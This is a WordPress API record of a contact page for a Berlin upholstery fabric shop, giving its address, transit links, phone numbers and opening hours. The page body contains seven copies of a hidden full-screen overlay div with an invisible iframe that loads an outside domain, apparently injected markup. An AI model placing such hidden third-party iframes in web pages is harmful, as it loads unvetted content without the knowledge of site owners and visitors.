{"id":23,"date":"2020-12-16T14:48:40","date_gmt":"2020-12-16T13:48:40","guid":{"rendered":"http:\/\/lampasundseide.de\/WP-Website\/?page_id=23"},"modified":"2020-12-16T15:27:53","modified_gmt":"2020-12-16T14:27:53","slug":"kontakt","status":"publish","type":"page","link":"http:\/\/lampasundseide.de\/WP-Website\/kontakt\/","title":{"rendered":"Kontakt"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"23\" class=\"elementor elementor-23\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8e31f88 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8e31f88\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a3d0a4f\" data-id=\"a3d0a4f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-d5f201e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d5f201e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-f8470e0\" data-id=\"f8470e0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9c9eebf elementor-widget elementor-widget-text-editor\" data-id=\"9c9eebf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p>In der <strong>Schmiljanstra\u00dfe 12, 12161 Berlin-Friedenau<\/strong><\/p>\n<p><\/p>\n<p>finden Sie unseren Laden mit einer gro\u00dfen Auswahl an Polster- und Dekorationsstoffen zwischen Kaisereiche und Friedrich-Wilhelm-Platz an der Ecke Handjerystra\u00dfe.<\/p>\n<p><\/p>\n<p><strong>Fahrverbindungen:<\/strong> U-Bahnhof Friedrich-Wilhelm-Platz (U9) oder Bushaltestelle Kaisereiche (M 48 \/ M 85 \/ 186)<\/p>\n<p><\/p>\n<p>\u00a0<\/p>\n<p><\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-d607fec\" data-id=\"d607fec\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-530b925 elementor-widget elementor-widget-text-editor\" data-id=\"530b925\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\n<p><strong>Telefon<\/strong>: 030 46604738<br \/><strong>Mobil<\/strong>: 0176 43917482<br \/><strong>E-Mail<\/strong>: <a href=\"mailto:einrichtung@lampasundseide.de\">einrichtung@lampasundseide.de<\/a><\/p>\n\n<p><strong>Unsere \u00d6ffnungszeiten:<\/strong> Montag \u2013 Freitag von 10 \u2013 18 Uhr, Samstag von 10 \u2013 14 Uhr<\/p>\n\n<p><strong>Wir beraten Sie kostenlos und unverbindlich!<\/strong><\/p>\n\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>In der Schmiljanstra\u00dfe 12, 12161 Berlin-Friedenau finden Sie unseren Laden mit einer gro\u00dfen Auswahl an Polster- und Dekorationsstoffen zwischen Kaisereiche und Friedrich-Wilhelm-Platz an der Ecke Handjerystra\u00dfe. Fahrverbindungen: U-Bahnhof Friedrich-Wilhelm-Platz (U9) oder Bushaltestelle Kaisereiche (M 48 \/ M 85 \/ 186) \u00a0 Telefon: 030 46604738Mobil: 0176 43917482E-Mail: einrichtung@lampasundseide.de Unsere \u00d6ffnungszeiten: Montag \u2013 Freitag von 10 \u2013 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":16,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-23","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/23","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/comments?post=23"}],"version-history":[{"count":7,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/23\/revisions"}],"predecessor-version":[{"id":51,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/23\/revisions\/51"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media\/16"}],"wp:attachment":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media?parent=23"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}